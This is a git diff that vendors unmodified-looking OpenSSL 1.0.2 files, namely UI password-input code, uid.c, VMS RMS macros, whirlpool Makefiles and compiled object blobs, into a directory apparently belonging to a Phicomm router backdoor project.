+        if (i == SIGUSR1)
+            continue;
+#  endif
+#  ifdef SIGUSR2
+        if (i == SIGUSR2)
+            continue;
+#  endif
+#  ifdef SIGACTION
+        sigaction(i, &savsig[i], NULL);
+#  else
+        signal(i, savsig[i]);
+#  endif
+    }
+# endif
+}
+
+static void recsig(int i)
+{
+    intr_signal = i;
+}
+#endif
+
+/* Internal functions specific for Windows */
+#if defined(OPENSSL_SYS_MSDOS) && !defined(OPENSSL_SYS_WIN16) && !defined(OPENSSL_SYS_WINCE)
+static int noecho_fgets(char *buf, int size, FILE *tty)
+{
+    int i;
+    char *p;
+
+    p = buf;
+    for (;;) {
+        if (size == 0) {
+            *p = '\0';
+            break;
+        }
+        size--;
+# ifdef WIN16TTY
+        i = _inchar();
+# elif defined(_WIN32)
+        i = _getch();
+# else
+        i = getch();
+# endif
+        if (i == '\r')
+            i = '\n';
+        *(p++) = i;
+        if (i == '\n') {
+            *p = '\0';
+            break;
+        }
+    }
+# ifdef WIN_CONSOLE_BUG
+    /*
+     * Win95 has several evil console bugs: one of these is that the last
+     * character read using getch() is passed to the next read: this is
+     * usually a CR so this can be trouble. No STDIO fix seems to work but
+     * flushing the console appears to do the trick.
+     */
+    {
+        HANDLE inh;
+        inh = GetStdHandle(STD_INPUT_HANDLE);
+        FlushConsoleInputBuffer(inh);
+    }
+# endif
+    return (strlen(buf));
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_openssl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_openssl.o
new file mode 100644
index 0000000000000000000000000000000000000000..3897f4dac40650db1fb802728767ed0dbfadf962
GIT binary patch
literal 1080
zcmbVLO-sW-5S=vj^B{T?yu_1=c1iu9=s^Od_9Eh?;7LhhP^tN#y8(OAzu?dD*uUg2
z(3xZxm)%s*fyvu>``+wi)4mNZFItWRDjYb6pGvU+9~v1{bO5Wc0x<0N&%E7HRA!>|
zPT3LjJKbJcmEG4vpZUjoHC^{=BdlXCU=FWF&;pnd=VJaAbbK2=znU~|<HXbxyElY8
z=QOvP$~L&LXp_jeIFS|Q(_LO98RyR|24H-eiZDVHlNuk@N+d4=*nKEMU=ioQ;yg{0
z47n^93B$|ja1q91SwCbYD<;@_BBs`%e<!xkLU(GuSum%S_W3KtHa>|nzgtl4+7Hve
zgOX*;|N0NmOFex|Jpx(m>m;t#`3g@oPM41LLR%}Jq6WBF!Zd$jg%o%a70|otLH$fG
t?Y~RWOd|PI616FL{O4JBM_bo&&^4)3V9vjR8|K}U_ErjSlu@GT{|3%VI;8*r

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_util.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_util.c
new file mode 100644
index 0000000..f65f80d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_util.c
@@ -0,0 +1,93 @@
+/* crypto/ui/ui_util.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2001-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <string.h>
+#include "ui_locl.h"
+
+int UI_UTIL_read_pw_string(char *buf, int length, const char *prompt,
+                           int verify)
+{
+    char buff[BUFSIZ];
+    int ret;
+
+    ret =
+        UI_UTIL_read_pw(buf, buff, (length > BUFSIZ) ? BUFSIZ : length,
+                        prompt, verify);
+    OPENSSL_cleanse(buff, BUFSIZ);
+    return (ret);
+}
+
+int UI_UTIL_read_pw(char *buf, char *buff, int size, const char *prompt,
+                    int verify)
+{
+    int ok = 0;
+    UI *ui;
+
+    if (size < 1)
+        return -1;
+
+    ui = UI_new();
+    if (ui) {
+        ok = UI_add_input_string(ui, prompt, 0, buf, 0, size - 1);
+        if (ok >= 0 && verify)
+            ok = UI_add_verify_string(ui, prompt, 0, buff, 0, size - 1, buf);
+        if (ok >= 0)
+            ok = UI_process(ui);
+        UI_free(ui);
+    }
+    if (ok > 0)
+        ok = 0;
+    return (ok);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_util.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_util.o
new file mode 100644
index 0000000000000000000000000000000000000000..05f7ae9e86abe6cc4a6dff2d5ca4c4d2c8f0d5bb
GIT binary patch
literal 2408
zcmbuA&2Jk;6u`%J(u9(ZO~t`ds%j4b89`TGibUuEWnFKwh9z;EEDaxK+1Q)Ls^diV
znm7o7qTs^Fq=2|o;=n(E1jnccWXT0m35p03m!7zRREiLY0|Lx@yF1BrWnbV)v+vDs
z-kW(lZ)W!m&6tixB7{qXJV_3FoDz~ca%fL^<`g+b#>j8+lYegS^;-M!D<1(?FR0Jv
z*iF^c*yrj(j{R=x?C*K@oxXiL`6Gtq*q2J@nO4trvO7=rG^L}npOk%r{b8_PmKhUc
zo)_!3I!#4u{p_C18|(*V9~{kW+n6}vdwNdKKL>8Nnnxir2;x@j)-J9UpY7_~*OM<4
z)ECu)`jTpOyO^$-W8YpQLy#=nGuRD%>$U`)lHMMAAO%r6dvhWQK<RA#gI@YhWg;1$
z{a$Bxyk$P~Ap3=7gJku#A5hXy`!lp*#2xmW^{wkTd7(>Y&YnFZrOc&9)on;m$fxD>
zDdq8o*HvDBG%cqed&tL_Il(nZ0@^UNnOT!W3F#n<K|{IUS0wW4c@k+RBI9EtqwhiC
z7J;7##y&xPjwarXW@z$COrz4ykVaGQ3}<Qj@{uf^+#Z>x`3<_5qc5MMiz>}8(@B-4
zRhr6B31Tudk)fk%_lvK-zWEIy5=_^`IYBn@q0z+Us7XH^jTUG^rK89O2%f1S@@uc(
zaIEi%!*}Ixdv{dK+nu`^_F_ahq{48Fj0n9$Ge-Jn9P@Vl&=0M9p&b|U^!66mI5ezN
zSQG&L_~Za?4B++vUKzk$;Fu@R&#M!#_5lA62XN9TTMf5dk&DF4S>{5{uxgH7veq|<
zHDk<WRKuE^o}SkhtOYe=Xcl@^oeflWsbrO_>kZecyR~xlB4@8Swes?&0M~14MW<fJ
z@#UK1pcWV6o^yF^c7EQliWSGM)*WKOfL**~6<01<%XS%ef{;hNr+;s-R)6(;IWO=r
zfo}->n84o>I2HK&0*?#)j==8`I6vrkXYUjEI9>!0<j0}$JSDJE;GTQU>%il+z~G$M
zmB{tYRo7ku?bdv~!mXN9v1Qk3x<oG7u1(}6*krl5wz}$6fmPRBM}}|8DQ_Et{>5rT
zhI*_!HFuN9-VDwPl*L|kcq;!(OAw8(9=@Sdz)(`bzW6=gm)ofEp5dNNK@(*UAxOu2
z5^@wYPQ`C_GT;veJp4sj39TEr3pd>-c)oDX{~C|q16(Q%O%%TV!y*Kmr^WRdfr+jk
za0e0g@qG#yeg*LyiE=fFmqZ9Q-#?C*z(Ch<{B96`l{*GH9A5z5uYPai4-SOy3)T-~
zc|5OQzqK(gA0)IF<bih|?_oF|S-5t92>$6&KK9kYGnnq6k9W9V{BDqc<-pT7!twtC
DO&?E>

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/uid.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/uid.c
new file mode 100644
index 0000000..90694c6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/uid.c
@@ -0,0 +1,88 @@
+/* crypto/uid.c */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/crypto.h>
+#include <openssl/opensslconf.h>
+
+#if defined(__OpenBSD__) || (defined(__FreeBSD__) && __FreeBSD__ > 2)
+
+# include OPENSSL_UNISTD
+
+int OPENSSL_issetugid(void)
+{
+    return issetugid();
+}
+
+#elif defined(OPENSSL_SYS_WIN32) || defined(OPENSSL_SYS_VXWORKS) || defined(OPENSSL_SYS_NETWARE)
+
+int OPENSSL_issetugid(void)
+{
+    return 0;
+}
+
+#else
+
+# include OPENSSL_UNISTD
+# include <sys/types.h>
+
+int OPENSSL_issetugid(void)
+{
+    if (getuid() != geteuid())
+        return 1;
+    if (getgid() != getegid())
+        return 1;
+    return 0;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/uid.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/uid.o
new file mode 100644
index 0000000000000000000000000000000000000000..d2e4d5ca2e381427cd947ec60971f54de6bca5e3
GIT binary patch
literal 1752
zcmbu8L2pt)5P;`FwN)vg=|NMYoJ@^&1#MJ%XrT2$Vz3x#PsY4H;0eS64R2r4deDQX
z-n^K2)1TnUcqHM^cr{*(F{v}lPP;rG9(0n~nfZ2ScHiv2*LI~8vn*h-U=2<prU38b
zCw@V>1(=5fd{15ZS^G-haHLG}aQKA^JjjoN1#==lO1&GVJ`bOcpuDlMnpxVe2R#{N
z^5TxjF6ZtAD$KpQofX-Y>thTsgQe1_r%=nA+Ykd766516pig4Gd;->f+FDG^&b`I`
zFC!x*S)svBrr*SR$vN`>B6Rc__;wVvBp%rrIt!m>GApi5KglSH!|6Yv;<HnD^r_>j
zE0ZZy;ev5a_3g+mp;8~iatlEezdMDmP2u(w4ne0W8c=;~Z`NuRr{nvc3|gHgIOR%p
zy;yOorBcn_a<+==72AOp&f+8*Pg`0`Az2je9KC^asK1WJGEb8z#1p8@uM$KdPHUK7
zBZxvgiOM{KJ_)`vr7EC7_y=9-*3rtr*tXdlc)PBU-o6CUbfpWT?)xAb{chLmA?x*}
zC-Chq`_gT^&~d95h`m97&l|`C5UPULcAgL1u6MlU|2P>;rnk)f;#vjm@Vj76YfV|i
zfO=CfA^M-FF(^A~1UQS9a`}Z`)SUWDJp5-!Js&pV{cqv|s`;<^In1S+SyWSa{~IPm
zpZ90GYA|!@2Qx5y&SUft9r_n_yBNbq?PZS1*x~*$uA@UW!}&wK;J&tO!uii|BI^Fq
zx}khebbpk~`OKsCroDd9fYR0<O#k2+)Nnqr@ZBMT9sNO%C@>`4zw<a3mA|Cnu8~V_
GIR7``V3U#n

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/vms_rms.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/vms_rms.h
new file mode 100644
index 0000000..09c280e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/vms_rms.h
@@ -0,0 +1,50 @@
+
+#ifdef NAML$C_MAXRSS
+
+# define CC_RMS_NAMX cc$rms_naml
+# define FAB_NAMX fab$l_naml
+# define FAB_OR_NAML( fab, naml) naml
+# define FAB_OR_NAML_DNA naml$l_long_defname
+# define FAB_OR_NAML_DNS naml$l_long_defname_size
+# define FAB_OR_NAML_FNA naml$l_long_filename
+# define FAB_OR_NAML_FNS naml$l_long_filename_size
+# define NAMX_ESA naml$l_long_expand
+# define NAMX_ESL naml$l_long_expand_size
+# define NAMX_ESS naml$l_long_expand_alloc
+# define NAMX_NOP naml$b_nop
+# define SET_NAMX_NO_SHORT_UPCASE( nam) nam.naml$v_no_short_upcase = 1
+
+# if __INITIAL_POINTER_SIZE == 64
+#  define NAMX_DNA_FNA_SET(fab) fab.fab$l_dna = (__char_ptr32) -1; \
+   fab.fab$l_fna = (__char_ptr32) -1;
+# else                          /* __INITIAL_POINTER_SIZE == 64 */
+#  define NAMX_DNA_FNA_SET(fab) fab.fab$l_dna = (char *) -1; \
+   fab.fab$l_fna = (char *) -1;
+# endif                         /* __INITIAL_POINTER_SIZE == 64 [else] */
+
+# define NAMX_MAXRSS NAML$C_MAXRSS
+# define NAMX_STRUCT NAML
+
+#else                           /* def NAML$C_MAXRSS */
+
+# define CC_RMS_NAMX cc$rms_nam
+# define FAB_NAMX fab$l_nam
+# define FAB_OR_NAML( fab, naml) fab
+# define FAB_OR_NAML_DNA fab$l_dna
+# define FAB_OR_NAML_DNS fab$b_dns
+# define FAB_OR_NAML_FNA fab$l_fna
+# define FAB_OR_NAML_FNS fab$b_fns
+# define NAMX_ESA nam$l_esa
+# define NAMX_ESL nam$b_esl
+# define NAMX_ESS nam$b_ess
+# define NAMX_NOP nam$b_nop
+# define NAMX_DNA_FNA_SET(fab)
+# define NAMX_MAXRSS NAM$C_MAXRSS
+# define NAMX_STRUCT NAM
+# ifdef NAM$M_NO_SHORT_UPCASE
+#  define SET_NAMX_NO_SHORT_UPCASE( nam) naml.naml$v_no_short_upcase = 1
+# else                          /* def NAM$M_NO_SHORT_UPCASE */
+#  define SET_NAMX_NO_SHORT_UPCASE( nam)
+# endif                         /* def NAM$M_NO_SHORT_UPCASE [else] */
+
+#endif                          /* def NAML$C_MAXRSS [else] */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/Makefile
new file mode 100644
index 0000000..f4d46e4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/Makefile
@@ -0,0 +1,96 @@
+#
+# crypto/whrlpool/Makefile
+#
+
+DIR=	whrlpool
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+WP_ASM_OBJ=wp_block.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=wp_test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=wp_dgst.c wp_block.c
+LIBOBJ=wp_dgst.o $(WP_ASM_OBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= whrlpool.h
+HEADER= wp_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+wp-mmx.s:	asm/wp-mmx.pl ../perlasm/x86asm.pl
+	$(PERL) asm/wp-mmx.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+wp-x86_64.s: asm/wp-x86_64.pl
+	$(PERL) asm/wp-x86_64.pl $(PERLASM_SCHEME) > $@
+
+$(LIBOBJ): $(LIBSRC)
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+wp_block.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+wp_block.o: ../../include/openssl/whrlpool.h wp_block.c wp_locl.h
+wp_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+wp_dgst.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+wp_dgst.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+wp_dgst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+wp_dgst.o: ../../include/openssl/whrlpool.h wp_dgst.c wp_locl.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/Makefile.bak
new file mode 100644
index 0000000..f4d46e4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/Makefile.bak
@@ -0,0 +1,96 @@
+#
+# crypto/whrlpool/Makefile
+#
+
+DIR=	whrlpool
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+WP_ASM_OBJ=wp_block.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=wp_test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=wp_dgst.c wp_block.c
+LIBOBJ=wp_dgst.o $(WP_ASM_OBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= whrlpool.h
+HEADER= wp_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+wp-mmx.s:	asm/wp-mmx.pl ../perlasm/x86asm.pl
+	$(PERL) asm/wp-mmx.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+wp-x86_64.s: asm/wp-x86_64.pl
+	$(PERL) asm/wp-x86_64.pl $(PERLASM_SCHEME) > $@
+
+$(LIBOBJ): $(LIBSRC)
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+wp_block.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+wp_block.o: ../../include/openssl/whrlpool.h wp_block.c wp_locl.h
+wp_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+wp_dgst.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+wp_dgst.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+wp_dgst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+wp_dgst.o: ../../include/openssl/whrlpool.h wp_dgst.c wp_locl.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/Makefile.save
new file mode 100644
index 0000000..f4d46e4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/Makefile.save
@@ -0,0 +1,96 @@
+#
+# crypto/whrlpool/Makefile
+#
+
+DIR=	whrlpool
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+WP_ASM_OBJ=wp_block.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=wp_test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=wp_dgst.c wp_block.c
+LIBOBJ=wp_dgst.o $(WP_ASM_OBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= whrlpool.h
+HEADER= wp_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+wp-mmx.s:	asm/wp-mmx.pl ../perlasm/x86asm.pl
+	$(PERL) asm/wp-mmx.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+wp-x86_64.s: asm/wp-x86_64.pl
+	$(PERL) asm/wp-x86_64.pl $(PERLASM_SCHEME) > $@
+
+$(LIBOBJ): $(LIBSRC)
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+wp_block.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+wp_block.o: ../../include/openssl/whrlpool.h wp_block.c wp_locl.h
+wp_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+wp_dgst.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+wp_dgst.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+wp_dgst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+wp_dgst.o: ../../include/openssl/whrlpool.h wp_dgst.c wp_locl.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/asm/wp-mmx.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/asm/wp-mmx.pl
new file mode 100644
index 0000000..c584e5b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/asm/wp-mmx.pl
@@ -0,0 +1,495 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. Rights for redistribution and usage in source and binary
+# forms are granted according to the OpenSSL license.
+# ====================================================================
+#
+# whirlpool_block_mmx implementation.
+#
